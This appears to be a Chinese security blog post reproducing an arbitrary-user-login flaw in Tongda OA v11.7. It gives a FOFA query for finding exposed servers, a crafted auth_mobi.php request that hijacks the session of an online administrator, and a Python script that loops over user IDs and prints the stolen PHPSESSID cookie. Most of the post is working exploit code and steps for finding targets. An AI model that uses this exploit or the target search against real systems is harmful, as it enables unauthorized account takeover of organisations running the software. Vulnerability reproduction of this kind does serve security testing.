spaceman'blog > 通达OA v11.7 在线任意用户登录

通达OA v11.7 在线任意用户登录

2021-03-15

权限

# 通达 OA v11.7 在线任意用户登录

# 漏洞描述

需要有在线用户才能登录

# 资产查找

FOFA:

1
app="TDXK-通达OA"

# 漏洞复现

首先访问:

1
http://xxx.xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

页面空白则表示用户在线,并且此时已经获取到了 cookie

image-20210315122539178

返回显示 RELOGIN ,则不在线

若在线,则访问成功登录 uid 为 1 的用户,也就是管理员用户

image-20210315122728392

exp 脚本如下(来源网络):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
from bs4 import BeautifulSoup
import sys
import re

url = "http://127.0.0.1/"
for i in range(1,600):
    try :
        vuln_url = url + "/mobile/auth_mobi.php?isAvatar=1&uid="+str(i)+"&P_VER=0"
        resp = requests.get(vuln_url)
        soup = BeautifulSoup(resp.text,'html.parser')
    
        if 'RELOGIN' in soup.get_text():
            print(i,"不存在")
        else:
            PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(resp.headers))
            print('uid = '+str(i)+" 在线,COOKIE值是:PHPSESSID="+str(PHPSESSION[0]))
            print(url+"/mobile/auth_mobi.php?isAvatar=1&uid="+str(i)+"&P_VER=0")
            print(url+"/general/")
            break
    except:
        print('站点不存在漏洞!')
        break

管理员用户

image-20210315123014108

其他用户

image-20210315123411860